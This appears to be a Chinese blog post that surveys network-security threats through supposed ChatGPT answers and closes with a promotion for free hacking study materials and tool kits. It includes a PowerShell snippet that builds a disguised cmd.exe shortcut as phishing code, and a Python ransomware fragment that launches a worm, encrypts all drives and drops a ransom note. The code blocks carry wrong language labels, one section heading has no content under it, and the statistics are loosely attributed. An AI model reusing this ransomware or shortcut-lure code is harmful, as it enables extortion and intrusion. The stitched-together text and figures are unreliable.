ChatGPT：你真的了解网络安全吗？浅谈攻击防御进行时之传统的网络安全

ChatGPT（全名：Chat Generative Pre-trained Transformer），美国OpenAI 研发的聊天机器人程序，是人工智能技术驱动的自然语言处理工具。

基于其语言模型庞大、可控制、具有高度扩展性的特点，本文通过对话ChatGPT，浅谈网络安全攻击防御进行时。

【一一帮助安全学习，所有资源获取处一一】

①网络安全学习路线

②20份渗透测试电子书

③安全攻防357页笔记

④50份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年CTF夺旗赛题解析

网络安全新总结

目前网络安全的总体态势可以说是比较严峻的，黑客攻击手段和频率在不断增加，而且攻击手法越来越复杂和隐蔽。

总体来看，从攻击的种类和方式上来看，社交工程攻击和网络钓鱼是黑客攻击的两个主要手段。这种攻击方式主要利用了人们的信任心理，通过发送诱骗信息，获取受害者的敏感信息或者执行恶意程序等。

以下是ChatGPT给出的一些社交工程攻击和网络钓鱼的数据： 部分网络钓鱼代码：

php复制代码$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ''+ $file
$Shortcut.Save()

此外，最近几年还出现了大量的勒索软件攻击事件。勒索软件通常是通过邮件附件或者漏洞攻击入侵系统，然后加密文件，使得受害者无法正常使用个人信息或者机构数据。

以下是ChatGPT给出的一些勒索软件攻击的数据：

值得一提的是，IOT设备的大规模应用也带来了新的安全挑战，在攻击和防御方面都存在很大的难度。需要IoT设备厂商和相关组织一起提高设备的安全性和规范性，从而保证用户的信息安全。

关于黑客攻击次数上升的数据，由于统计方式和来源的不同，数据各有不同。根据某些研究机构的报告，2019年全球发生的网络攻击事件比2018年增加了50％，而2020年的数字更是创下历史新高，其中大量攻击事件是以勒索软件为主。此外，还有许多未被报告或未被发现的攻击事件，数字应该更高。

提问ChatGPT：请列举近年来具有代表性的黑客攻击事件 ChatGPT回答如下：

---

根据Symantec公司在2019年发布的报告，全球平均每一个月有5.6亿个网络安全攻击事件发生。

部分勒索病毒代码：

c复制代码def main():
    # 主函数
    os_system = check_os() # 操作系统检测 
    if len(sys.argv) == 2:
        if sys.argv[1]=='en': # 加密
            # 获取aes_key用于加密文件
            # 获取用于提示被勒索者的消息
            aes_key, msg = get_en_msg_key() 

            if os_system == 'windows':
                worm_t = Thread(target=worm)        #开启蠕虫
                worm_t.start()
                drives = get_drives()               #获取磁盘--需要修改
              
                for drive in drives:
                    t = Thread(target=Encrypt, args=(drive,msg,aes_key))  #遍历后加密
                    t.start()
                desk = os.path.join(os.path.expanduser("~"), 'Desktop') + "\\"  #将初始路径组件扩展到用户的主目录
                back_file = desk + "HOW_TO_BACK_FILES.txt"   
                if not os.path.exists(back_file):           #检查指定路径是否存在
                    with open(back_file, "wb") as f:        #创建文本写入msg
                        f.write(msg)
            else:
                t = Thread(target=Encrypt, args=("/",msg,aes_key))  #创建线程，开启加密模块进行加密
                t.start()

根据Check Point Software Technologies公司在2020年发布的报告，由于COVID-19疫情，网络攻击事件在2020年上半年增加了30%，而且勒索软件攻击事件增加了50%

根据Ponemon Institute在2020年发布的报告，其中美国企业的平均数据泄露成本达到了860万美元，而且平均数据泄露时间为280天。

---

总结

攻与防，是安全人员离不开的话题。 在科技高速发展的背景下，黑客攻击日趋隐蔽性、复杂性、难以防范性，网络安全防御的总体态势也在不断加强。

当前，许多国家和地区都在加强网络安全意识的推广，并建立了完善的法规和标准来规范网络安全行为和技术。同时，各类安全厂商和组织也在不断投入更多的资源和精力，以提高网络安全的水平和能力。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，如果你对网络安全入门感兴趣，需要的话可以在下方